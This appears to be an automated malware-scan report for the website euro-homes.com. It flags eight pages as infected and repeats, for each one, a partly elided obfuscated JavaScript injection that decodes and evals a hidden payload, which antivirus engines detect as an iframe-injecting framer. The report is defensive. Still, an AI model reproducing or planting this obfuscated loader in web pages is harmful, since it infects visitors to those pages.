New scan:

Malware Scanner report for euro-homes.com

Malicious/Suspicious/Total urls checked
8/0/15
8 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "euro-homes.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=euro-homes.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://euro-homes.com/
200 OK
Content-Length: 17457
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0164,0154,0154,0136,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,01
... 1540 bytes are skipped ...
54,0141,0146,0163,073,044,046,070,012,07,035,035,035,035,035,035,035,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,077,0166,0106,0141,045,044,0164,0154,0154,0136,044,046,053,0136,0155,0155,0142,0153,0141,0100,0145,0146,0151,0141,045,0164,0154,0154,0136,046,070,012,07,035,035,035,035,0172,012,07,0172,046,045,046,070);}w=f;s=[];if(window.document)for(i=2-2;-i+482!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+3);}xz=e;if(window.document)if(v)xz(s)}

Antivirus reports:

TrendMicro
HEUR_HTJS.HDJSFN
Fortinet
JS/Obfuscus.AACB!tr
AVG
HTML/Framer

http://euro-homes.com/file:///H:/Euro-homes/index.htm
404 Not Found
Content-Length: 229
Content-Type: text/html
clean
http://euro-homes.com/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean
http://euro-homes.com/chalets.htm
200 OK
Content-Length: 22140
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0164,0154,0154,0136,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,01
... 1540 bytes are skipped ...
54,0141,0146,0163,073,044,046,070,012,07,035,035,035,035,035,035,035,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,077,0166,0106,0141,045,044,0164,0154,0154,0136,044,046,053,0136,0155,0155,0142,0153,0141,0100,0145,0146,0151,0141,045,0164,0154,0154,0136,046,070,012,07,035,035,035,035,0172,012,07,0172,046,045,046,070);}w=f;s=[];if(window.document)for(i=2-2;-i+482!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+3);}xz=e;if(window.document)if(v)xz(s)}

Antivirus reports:

TrendMicro
HEUR_HTJS.HDJSFN
Fortinet
JS/Obfuscus.AACB!tr
AVG
HTML/Framer

http://euro-homes.com/phofes3.htm
200 OK
Content-Length: 3627
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0164,0154,0154,0136,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,01
... 1540 bytes are skipped ...
54,0141,0146,0163,073,044,046,070,012,07,035,035,035,035,035,035,035,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,077,0166,0106,0141,045,044,0164,0154,0154,0136,044,046,053,0136,0155,0155,0142,0153,0141,0100,0145,0146,0151,0141,045,0164,0154,0154,0136,046,070,012,07,035,035,035,035,0172,012,07,0172,046,045,046,070);}w=f;s=[];if(window.document)for(i=2-2;-i+482!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+3);}xz=e;if(window.document)if(v)xz(s)}

Antivirus reports:

TrendMicro
HEUR_HTJS.HDJSFN
Fortinet
JS/Obfuscus.AACB!tr
AVG
HTML/Framer

http://euro-homes.com/phofes2.htm
200 OK
Content-Length: 3626
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0164,0154,0154,0136,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,01
... 1540 bytes are skipped ...
54,0141,0146,0163,073,044,046,070,012,07,035,035,035,035,035,035,035,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,077,0166,0106,0141,045,044,0164,0154,0154,0136,044,046,053,0136,0155,0155,0142,0153,0141,0100,0145,0146,0151,0141,045,0164,0154,0154,0136,046,070,012,07,035,035,035,035,0172,012,07,0172,046,045,046,070);}w=f;s=[];if(window.document)for(i=2-2;-i+482!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+3);}xz=e;if(window.document)if(v)xz(s)}

Antivirus reports:

TrendMicro
HEUR_HTJS.HDJSFN
Fortinet
JS/Obfuscus.AACB!tr
AVG
HTML/Framer

http://euro-homes.com/phofes1.htm
200 OK
Content-Length: 3633
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0164,0154,0154,0136,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,01
... 1540 bytes are skipped ...
54,0141,0146,0163,073,044,046,070,012,07,035,035,035,035,035,035,035,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,077,0166,0106,0141,045,044,0164,0154,0154,0136,044,046,053,0136,0155,0155,0142,0153,0141,0100,0145,0146,0151,0141,045,0164,0154,0154,0136,046,070,012,07,035,035,035,035,0172,012,07,0172,046,045,046,070);}w=f;s=[];if(window.document)for(i=2-2;-i+482!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+3);}xz=e;if(window.document)if(v)xz(s)}

Antivirus reports:

TrendMicro
HEUR_HTJS.HDJSFN
Fortinet
JS/Obfuscus.AACB!tr
AVG
HTML/Framer

http://euro-homes.com/pdf/fesival1.pdf
200 OK
Content-Length: 8720
Content-Type: application/pdf
clean
http://euro-homes.com/pdf/fesival2.pdf
200 OK
Content-Length: 13149
Content-Type: application/pdf
clean
http://euro-homes.com/pdf/festival3.pdf
200 OK
Content-Length: 14690
Content-Type: application/pdf
clean
http://euro-homes.com/pdf/fesival4.pdf
200 OK
Content-Length: 8384
Content-Type: application/pdf
clean
http://euro-homes.com/phocap1.htm
200 OK
Content-Length: 3629
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0164,0154,0154,0136,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,01
... 1540 bytes are skipped ...
54,0141,0146,0163,073,044,046,070,012,07,035,035,035,035,035,035,035,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,077,0166,0106,0141,045,044,0164,0154,0154,0136,044,046,053,0136,0155,0155,0142,0153,0141,0100,0145,0146,0151,0141,045,0164,0154,0154,0136,046,070,012,07,035,035,035,035,0172,012,07,0172,046,045,046,070);}w=f;s=[];if(window.document)for(i=2-2;-i+482!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+3);}xz=e;if(window.document)if(v)xz(s)}

Antivirus reports:

TrendMicro
HEUR_HTJS.HDJSFN
Fortinet
JS/Obfuscus.AACB!tr
AVG
HTML/Framer

http://euro-homes.com/phocap2.htm
200 OK
Content-Length: 3601
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0164,0154,0154,0136,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,01
... 1540 bytes are skipped ...
54,0141,0146,0163,073,044,046,070,012,07,035,035,035,035,035,035,035,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,077,0166,0106,0141,045,044,0164,0154,0154,0136,044,046,053,0136,0155,0155,0142,0153,0141,0100,0145,0146,0151,0141,045,0164,0154,0154,0136,046,070,012,07,035,035,035,035,0172,012,07,0172,046,045,046,070);}w=f;s=[];if(window.document)for(i=2-2;-i+482!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+3);}xz=e;if(window.document)if(v)xz(s)}

Antivirus reports:

TrendMicro
HEUR_HTJS.HDJSFN
Fortinet
JS/Obfuscus.AACB!tr
AVG
HTML/Framer

http://euro-homes.com/phocap3.htm
200 OK
Content-Length: 3624
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0164,0154,0154,0136,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,01
... 1540 bytes are skipped ...
54,0141,0146,0163,073,044,046,070,012,07,035,035,035,035,035,035,035,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,077,0166,0106,0141,045,044,0164,0154,0154,0136,044,046,053,0136,0155,0155,0142,0153,0141,0100,0145,0146,0151,0141,045,0164,0154,0154,0136,046,070,012,07,035,035,035,035,0172,012,07,0172,046,045,046,070);}w=f;s=[];if(window.document)for(i=2-2;-i+482!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+3);}xz=e;if(window.document)if(v)xz(s)}

Antivirus reports:

TrendMicro
HEUR_HTJS.HDJSFN
Fortinet
JS/Obfuscus.AACB!tr
AVG
HTML/Framer

http://euro-homes.com/pdf/caprice1.pdf
200 OK
Content-Length: 9558
Content-Type: application/pdf
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: euro-homes.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 06:47:10 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: startBAK=R3415748110; path=/; expires=Tue, 03-Mar-2015 07:49:56 GMT
Set-Cookie: start=R118820077; path=/; expires=Tue, 03-Mar-2015 07:54:19 GMT
Second query (visit from search engine):
GET / HTTP/1.1
Host: euro-homes.com
Referer: http://www.google.com/search?q=euro-homes.com

Result:
The result is similar to the first query. There are no suspicious redirects found.